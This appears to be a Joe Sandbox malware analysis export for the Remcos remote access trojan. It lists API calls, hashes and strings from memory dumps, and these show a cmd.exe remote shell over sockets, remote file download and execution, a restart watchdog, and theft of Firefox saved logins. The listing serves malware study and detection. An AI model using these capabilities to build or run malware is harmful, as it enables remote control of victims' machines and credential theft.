                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F461
                                          • _free.LIBCMT ref: 0044F49A
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F4A1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EnvironmentStrings$Free_free
                                          • String ID:
                                          • API String ID: 2716640707-0
                                          • Opcode ID: 529e42a1fa36a4ac6123fcdb0dfb42304a8dc5a6142a13bb334c2dd4b346bc22
                                          • Instruction ID: 0fde98e0ac238faa149cd6f420f555edc5ad685e5938876998fddc3cfa248eb7
                                          • Opcode Fuzzy Hash: 529e42a1fa36a4ac6123fcdb0dfb42304a8dc5a6142a13bb334c2dd4b346bc22
                                          • Instruction Fuzzy Hash: 41E0E537545A226BB211323A6C49D6F2A58CFD27B6726003BF40486242EE288D0641BA
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475300), ref: 004135C2
                                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                          • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                          • RegCloseKey.KERNEL32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID:
                                          • API String ID: 1818849710-0
                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          • Opcode ID: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
                                          • Instruction ID: 3eac6c9810fdf3f5cdd4c6aee73cb3509883e52e26c84b2cc96e0464d85798e3
                                          • Opcode Fuzzy Hash: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
                                          • Instruction Fuzzy Hash: F6D017B58023189FC720DFA8E804A8DBBFCEB08210F00456AEC49E3300E770EC008B84
                                          APIs
                                          • _free.LIBCMT ref: 00446227
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap$_free
                                          • String ID:
                                          • API String ID: 1482568997-0
                                          • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                          • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                          • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                          • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 0041BB49
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$ForegroundText
                                          • String ID:
                                          • API String ID: 29597999-0
                                          • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                          • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                          • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                          • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID:
                                          • API String ID: 176396367-0
                                          • Opcode ID: 6416f66ed626dfbba5e3356b56a4da38da9dbdb7e4b27ac51402a9fd72fbddea
                                          • Instruction ID: d045c5f40cf3cd8d18dd0e016010c764e1ae3afdbf5b32035de166f485dbb4de
                                          • Opcode Fuzzy Hash: 6416f66ed626dfbba5e3356b56a4da38da9dbdb7e4b27ac51402a9fd72fbddea
                                          • Instruction Fuzzy Hash: 681193319002059BCB15EF66E842AEE7BB5AF54314B10403FF446672E2EF78AD15CB98
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                          APIs
                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
                                          • API String ID: 724789610-0
                                          • Opcode ID: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                          • Instruction ID: 8755cd578eecc9cf916cb98f31ec890f8d4d8ec8e876fe09ba6f20fbb4fb2f80
                                          • Opcode Fuzzy Hash: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                          • Instruction Fuzzy Hash: 02D0123255C60CCED620ABB4AD0F8A4775CC717616F0403BA6CB5C26D7E6405A2DC2AB
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                          • CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
                                          • CreatePipe.KERNEL32(00476CC8,00476CE4,00476BE8,00000000), ref: 004057CC
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474FA0,004660D0,00000062,004660B4), ref: 004059E4
                                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                          • CloseHandle.KERNEL32 ref: 00405A23
                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                          • CloseHandle.KERNEL32 ref: 00405A45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                          • String ID: @lG$@lG$@lG$@lG$@lG$SystemDrive$cmd.exe$kG$lG$lG$lG$lG
                                          • API String ID: 2994406822-3565532687
                                          • Opcode ID: b68ca69e07cf2efade3c1b410fee926f1740e5449c087315abb30bc2acd6c1d9
                                          • Instruction ID: efba9956b6c01968ba48be3e84054341744464a70a9fb060b5e58b4ef4e39929
                                          • Opcode Fuzzy Hash: b68ca69e07cf2efade3c1b410fee926f1740e5449c087315abb30bc2acd6c1d9
                                          • Instruction Fuzzy Hash: ED91B271600604AFD711FB35AD41A6B3AAAEB84344F01443FF549A72E2DB7D9C488F6D
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C37D
                                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C3AD
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C402
                                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C463
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C46A
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                          • Sleep.KERNEL32(000007D0), ref: 00408733
                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                           Similarity
                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                          • String ID: (aF$8PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$hPG$hPG$hPG$hPG$open
                                          • API String ID: 1067849700-1785547828
                                          • Opcode ID: b2e61bf4e72140d30d73e66eeb5ed928e9f66979c4dd0beefda9485d20436982
                                          • Instruction ID: d596b55e62c6dc406d7f5c06aadeacefb76b4acf2f669351df47ebe9cc805958
                                          • Opcode Fuzzy Hash: b2e61bf4e72140d30d73e66eeb5ed928e9f66979c4dd0beefda9485d20436982
                                          • Instruction Fuzzy Hash: 9F4282716043016BC604FB76C9579AE77A9AF91348F80483FF582671E2EE7C9908C79B
                                          APIs
                                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                          Similarity
                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                          • String ID: (TG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$RG
                                          • API String ID: 3018269243-1913798818
                                          • Opcode ID: 487cb0c94f3c81f9ea2266224390f7fb4e07e51fb2116567e8d70626cc6924ac
                                          • Instruction ID: 26abbb7e12f392f9fbc718c06b30ae47eaa1113e002934215aad22704783e961
                                          • Opcode Fuzzy Hash: 487cb0c94f3c81f9ea2266224390f7fb4e07e51fb2116567e8d70626cc6924ac
                                          • Instruction Fuzzy Hash: 3C71A23160420167C604FB72CD579AE77A4AE94308F40097FF586A61E2FFBC9945C69E
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                          • API String ID: 1164774033-3681987949
